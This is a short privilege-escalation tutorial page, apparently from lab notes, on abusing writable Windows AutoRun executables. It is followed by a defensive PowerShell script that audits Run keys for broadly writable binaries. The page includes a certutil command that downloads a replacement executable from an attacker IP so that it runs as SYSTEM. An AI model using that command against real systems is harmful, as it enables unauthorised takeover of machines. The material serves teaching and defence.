# AutoRuns

## Overview

**AutoRun** is a feature that automatically runs a program or application when a drive is mounted. This can be exploited by replacing the executable of an existing **AutoRun** program. When the computer restarts and an Administrator logs in, the malicious executable runs as **system**.

## Escalation via AutoRun

Check for **AutoRuns** in the registry using PowerUp:

<figure><img src="/files/7WGNkZLZJ1hOIYjdfUjB" alt=""><figcaption><p>TCM Windows Priv Esc on THM</p></figcaption></figure>

Check for **write** access to the file. The output should show **FILE\_ALL\_ACCESS** under **RW Everyone**:

```powershell
accesschk64.exe -wvu "C:\Program Files\Autorun Program\program.exe"
```

Replace the AutoRun executable:

```powershell
certutil.exe -urlcache -f http://10.10.14.1/program.exe "C:\Program Files\Autorun Program\program.exe"
```
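
The same check from the defender's side, as an added example that is not from the original page or from PowerUp: this PowerShell audit lists HKLM Run/RunOnce entries whose executable or parent folder grants write-type rights to Everyone, Authenticated Users or BUILTIN\Users. The list of keys and the `Get-AutorunExecutablePath` helper are assumptions chosen for illustration.

```powershell
# Added example: audit machine-wide autorun entries for binaries (or their
# folders) that broad, low-privileged groups are allowed to modify.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
)
# Well-known SIDs: Everyone, Authenticated Users, BUILTIN\Users
$broadSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545'
# WriteData | AppendData | Delete | ChangePermissions | TakeOwnership
# | GENERIC_ALL | GENERIC_WRITE (read-only bits deliberately excluded)
$writeMask = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000
$sidType = [System.Security.Principal.SecurityIdentifier]

# Hypothetical helper: pull the executable path out of an autorun command line
function Get-AutorunExecutablePath {
    param([string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine).Trim()
    if ($cmd -match '^"([^"]+)"') { return $Matches[1] }      # quoted path
    if ($cmd -match '^(.+?\.exe)\b') { return $Matches[1] }   # unquoted, may contain spaces
    return ($cmd -split '\s+')[0]
}

$findings = foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $item = Get-Item -Path $key
    foreach ($name in $item.GetValueNames()) {
        $exe = Get-AutorunExecutablePath ([string]$item.GetValue($name))
        if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
        # A writable parent folder lets the file be swapped even if the file ACL is tight
        foreach ($target in $exe, (Split-Path -Path $exe -Parent)) {
            $rules = (Get-Acl -LiteralPath $target).GetAccessRules($true, $true, $sidType)
            foreach ($ace in $rules) {
                $broad = $broadSids -contains $ace.IdentityReference.Value
                $write = ([int]$ace.FileSystemRights -band $writeMask) -ne 0
                if ($ace.AccessControlType -eq 'Allow' -and $broad -and $write) {
                    [pscustomobject]@{
                        RunKey = $key
                        Entry  = $name
                        Target = $target
                        Sid    = $ace.IdentityReference.Value
                        Rights = $ace.FileSystemRights
                    }
                }
            }
        }
    }
}
$findings | Format-Table -AutoSize -Wrap
```

Any row in the output is an autorun target that should have its write ACE removed so that only Administrators and SYSTEM can modify it; an empty result means no broadly writable autorun binaries were found under the audited keys.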

